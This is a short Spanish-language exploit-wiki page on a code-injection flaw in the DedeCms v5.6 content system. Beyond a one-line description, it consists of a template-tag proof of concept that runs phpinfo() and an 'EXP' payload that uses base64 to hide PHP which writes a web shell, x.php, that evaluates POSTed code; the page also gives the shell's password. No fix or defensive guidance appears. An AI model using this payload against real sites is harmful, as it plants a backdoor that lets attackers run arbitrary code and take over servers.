DedeCms v5.6 vulnerabilidad de ejecución de código malicioso integrado

From PwnWiki
Revision as of 11:44, 10 June 2021 by Pwnwiki (talk | contribs) (Created page with "DedeCms v5.6 vulnerabilidad de ejecución de código malicioso integrado")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎español • ‎português • ‎中文(台灣)‎

Información de vulnerabilidad

En la ubicación donde se carga el software, la dirección local no se verifica de manera efectiva y puede usarse de manera maliciosa.

POC

a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},

EXP

a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}

x.php
password:xiao
Retrieved from "https://pwnwiki.com/index.php?title=DedeCms_v5.6_嵌入惡意代碼執行漏洞/es&oldid=4700"